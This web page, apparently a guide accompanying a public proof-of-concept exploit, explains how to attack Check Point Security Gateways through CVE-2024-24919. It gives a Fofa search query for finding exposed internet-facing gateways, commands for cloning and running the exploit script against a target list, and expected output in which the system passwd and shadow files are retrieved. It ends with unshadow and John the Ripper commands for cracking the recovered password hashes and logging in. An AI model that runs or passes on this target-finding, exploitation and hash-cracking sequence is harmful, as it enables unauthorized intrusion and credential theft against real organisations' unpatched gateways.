Check Point Security Gateways Information Disclosure - CVE-2024-24919

Check Point Security Gateways Information Disclosure - CVE-2024-24919

Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with Remote Access VPN or Mobile Access Software Blades. A security fix that mitigates this vulnerability is available.

Read about it โ€” CVE-2024-24919

Disclaimer: This Proof of Concept (POC) is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end userโ€™s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Finding Targets

To find potential targets, use Fofa (similar to Shodan.io):

  • Fofa Dork: app=โ€Check_Point-SSL-Network-Extenderโ€

First, clone the repository

git clone https://github.com/verylazytech/CVE-2024-24919

Next chose your target and add it to list.txt file in this format:

  • https://ip_address

Run the Exploit

python3 CVE-2024-24919.py -l list.txt

Now There are 2 options of output:

Unsuccessful:

Alt text

Successful:

Crack the hash

Now after you find both file passwd & shadow you can try crack the hash with JohnTheRipper, after running the exploit you have 2 files, passwd & shadow, so you can merge them into one file and try crack them (I used rockyou.txt but it can be any password wordlist):

unshadow passwd shadow > unshadowed.txt 
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

And now after we crack the hash we can login to the user!

Last updated

Was this helpful?